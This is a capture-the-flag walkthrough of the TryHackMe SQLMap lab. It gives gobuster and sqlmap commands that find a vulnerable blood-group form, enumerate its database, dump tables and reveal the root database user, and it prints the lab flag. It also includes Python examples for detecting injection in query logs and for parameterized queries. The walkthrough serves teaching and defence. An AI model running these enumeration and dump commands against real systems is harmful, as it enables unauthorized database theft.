TryHackMe | SQLMAP | Walkthrough
Exploiting SQL Injection in a TryHackMe Lab
SQL injection (SQLi) remains one of the most critical vulnerabilities in modern web applications, frequently ranking in the OWASP Top 10. Despite being decades old, it continues to compromise organizations worldwide.
In this article, we walk through the SQLMap TryHackMe lab, a guided exercise that demonstrates how attackers identify and exploit SQLi vulnerabilities to extract sensitive data from insecure applications.
Target Discovery
The lab provides a target IP:
http://10.10.85.185/
At first glance, the root directory appears blank. To uncover hidden directories, we run a Gobuster scan:
gobuster dir -u http://10.10.85.185/ -w /usr/share/kali-wordlists/dirbuster/directory-list-2.3-medium.txt
Result: a new endpoint is discovered at http://10.10.85.185/blood/.
Initial Recon | The Blood Form
At /blood/, we find a form that accepts a blood group as input. Testing reveals that the form submits a POST request, making it a potential injection point.
Instead of injecting payloads manually, we use Burp Suite to capture the raw POST request and save it as bloodreq.txt for automated testing.
Step 1: Testing for SQL Injection with SQLMap
Using the captured request, we launch SQLMap against the blood_group parameter:
sqlmap -r bloodreq.txt -p blood_group --dbs
Flags explained:
- -r: load the request from a raw file.
- -p: name the parameter to test.
- --dbs: enumerate the databases on the backend server.
Output confirms that the parameter is vulnerable, and SQLMap begins enumerating available databases.
Step 2: Enumerating Tables
Suppose one of the identified databases is called blood. We enumerate its tables with:
sqlmap -r bloodreq.txt -p blood_group -D blood --tables
SQLMap outputs a list of tables for further exploration.
Step 3: Extracting Columns
Targeting the blood_db table, we enumerate its columns:
sqlmap -r bloodreq.txt -D blood -T blood_db --columns
The column names reveal the structure of the table and show where credentials or other application-specific data are stored.
Step 4: Dumping Data
The real value comes when dumping data from tables:
sqlmap -r bloodreq.txt -p blood_group -D blood -T blood_db --dump
Alternatively, dump everything:
sqlmap -r bloodreq.txt -D blood --dump-all
In this lab, dumping data reveals credentials and a flag table, the ultimate proof of compromise.
Step 5: Identifying Database User
Finally, we query the current database user:
sqlmap -r bloodreq.txt -p blood_group --current-user
The lab confirms that the database user is root.
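Each of Steps 1 to 5 above turns into a burst of database statements that looks nothing like normal form traffic, which is what a defender can key on. The following Python script is an added example written for this walkthrough; it is not part of the lab, of SQLMap, or of any product. It parses constructed lines in the shape of a MySQL general query log (the page does not state the lab's database engine, so the MySQL log format is an assumption), scores each statement against generic injection markers (N=N tautologies, UNION ... SELECT, information_schema lookups, SLEEP/BENCHMARK delays, comment tails) and flags any connection whose cumulative score crosses a threshold. The blood_db table and blood_group column come from the lab; the timestamps, thread ids, donor column and the statements themselves are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines shaped like a MySQL general query log
# (timestamp <TAB> thread-id command <TAB> statement). Not real lab output:
# threads 7 and 9 are ordinary form lookups, thread 8 mimics an automated
# enumeration run against the blood_group parameter.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z\t7 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'A+'
2024-05-01T10:00:02Z\t7 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'O-'
2024-05-01T10:00:03Z\t8 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'A+' AND 4371=4371-- x'
2024-05-01T10:00:04Z\t8 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'A+' AND SLEEP(5)-- x'
2024-05-01T10:00:05Z\t8 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'A+' UNION ALL SELECT NULL, schema_name FROM information_schema.schemata-- x'
2024-05-01T10:00:06Z\t8 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'A+' UNION ALL SELECT NULL, table_name FROM information_schema.tables WHERE table_schema = 'blood'-- x'
2024-05-01T10:00:07Z\t8 Query\tSELECT CURRENT_USER()
2024-05-01T10:00:08Z\t9 Query\tSELECT id, donor FROM blood_db WHERE blood_group = 'AB+'
"""

# One general-log line: timestamp, thread id, command type, statement text.
LINE_RE = re.compile(r"^(?P<ts>\S+)\t(?P<thread>\d+) (?P<cmd>\w+)\t(?P<stmt>.*)$")

# Generic injection markers with weights; none of these appear in the
# application's own fixed query, so every hit is suspicious.
RULES = [
    ("tautology",          re.compile(r"\b(\d+)=\1\b"), 2),
    ("union_select",       re.compile(r"\bUNION\b.*\bSELECT\b", re.IGNORECASE), 3),
    ("information_schema", re.compile(r"\binformation_schema\b", re.IGNORECASE), 3),
    ("time_delay",         re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE), 3),
    ("comment_tail",       re.compile(r"--\s|#|/\*"), 1),
]


def parse_line(line):
    """Split one general-log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def score_statement(stmt):
    """Return (score, [names of rules that matched]) for one SQL statement."""
    hits = [name for name, rx, _ in RULES if rx.search(stmt)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def analyse(log_text, threshold=5):
    """Aggregate scores per thread id (one client connection) and return the
    threads whose cumulative score reaches the threshold."""
    per_thread = defaultdict(lambda: {"score": 0, "hits": set(), "statements": 0})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["cmd"] != "Query":
            continue
        score, hits = score_statement(rec["stmt"])
        entry = per_thread[rec["thread"]]
        entry["score"] += score
        entry["hits"].update(hits)
        entry["statements"] += 1
    return {thread: data for thread, data in per_thread.items() if data["score"] >= threshold}


if __name__ == "__main__":
    for thread, data in analyse(SAMPLE_LOG).items():
        print(f"thread {thread}: score={data['score']} over {data['statements']} statements, "
              f"markers={sorted(data['hits'])}")
```

Scores are summed per connection rather than judged per statement because automated enumeration is a sequence: the first probe alone scores 3, but the whole run scores 21 while the legitimate lookups on threads 7 and 9 score 0. The general query log is costly on a busy server, so in practice the same rules would run over an audit plugin's output or over query logging in the application's database layer.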
Challenge Recap
- Interesting directory? → blood
- Current DB user? → root
- Final flag? → thm{sqlm@p_is_L0ve}
Key Takeaways
- SQLMap is a highly automated SQLi exploitation tool, reducing manual effort.
- SQL injection vulnerabilities can lead to complete database compromise — data exfiltration, credential theft, and even full system takeover.
- Always follow the principle of least privilege: web applications should never connect to the database as root in production.
- Legal Reminder: Tools like SQLMap should only be used in authorized environments such as labs or penetration testing engagements.
Final Thoughts
The TryHackMe SQLMap lab reinforces how trivial it can be for attackers to exploit misconfigured applications. For defenders, this underlines the importance of:
- Secure coding practices (prepared statements, ORM frameworks).
- Continuous vulnerability scanning and penetration testing.
- Strict database permissions and monitoring for suspicious queries.
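To make the first point concrete, here is an added example written for this walkthrough (not the lab's application code and not SQLMap's). It builds a tiny in-memory SQLite stand-in for the blood-group form's backend, shows the string-concatenated lookup that lets a textbook tautology probe change the query's meaning, and beside it the prepared-statement version and an allow-listed version that are unaffected. The blood_db table and blood_group column come from the lab; the donor names, the VALID_GROUPS set and the helper names are constructed for the example.

```python
import sqlite3

# Closed set of values the form legitimately accepts; anything else is rejected up front.
VALID_GROUPS = {"A+", "A-", "B+", "B-", "AB+", "AB-", "O+", "O-"}

# Constructed rows standing in for the lab's blood_db table.
SAMPLE_ROWS = [("Alice", "A+"), ("Bob", "O-"), ("Carol", "AB+")]


def make_db():
    """In-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blood_db (id INTEGER PRIMARY KEY, donor TEXT, blood_group TEXT)")
    conn.executemany("INSERT INTO blood_db (donor, blood_group) VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, blood_group):
    """The pattern SQLMap exploits: the user's value is spliced into the SQL text,
    so quotes and operators inside it become part of the query."""
    sql = f"SELECT donor FROM blood_db WHERE blood_group = '{blood_group}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, blood_group):
    """Prepared statement: the query shape is fixed and the value is bound
    separately, so it can only ever be compared as data."""
    sql = "SELECT donor FROM blood_db WHERE blood_group = ?"
    return [row[0] for row in conn.execute(sql, (blood_group,))]


def lookup_hardened(conn, blood_group):
    """Allow-list validation in front of the prepared statement (defence in depth):
    a blood group is a closed set, so unexpected input never reaches SQL at all."""
    if blood_group not in VALID_GROUPS:
        raise ValueError(f"rejected blood_group value: {blood_group!r}")
    return lookup_parameterized(conn, blood_group)


def compare(conn, value):
    """Run one input through all three lookups; 'rejected' where the allow-list refuses it."""
    try:
        hardened = lookup_hardened(conn, value)
    except ValueError:
        hardened = "rejected"
    return {
        "vulnerable": lookup_vulnerable(conn, value),
        "parameterized": lookup_parameterized(conn, value),
        "hardened": hardened,
    }


if __name__ == "__main__":
    db = make_db()
    # A normal value, then the textbook tautology probe automated scanners send.
    for value in ("A+", "A+' OR '1'='1"):
        print(repr(value), compare(db, value))
```

With the normal value all three lookups return the same single donor. With the probe, the concatenated query becomes `... WHERE blood_group = 'A+' OR '1'='1'` and returns every row, which is exactly the foothold the enumeration steps above build on; the parameterized query compares the whole string as one literal and returns nothing, and the allow-listed version rejects it before a query is built. Parameterization is the fix; the allow-list is the cheap second layer for fields whose valid values are known in advance.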
In the wrong hands, SQL injection is devastating. In the right hands, as demonstrated here, it is a powerful lesson in proactive defense.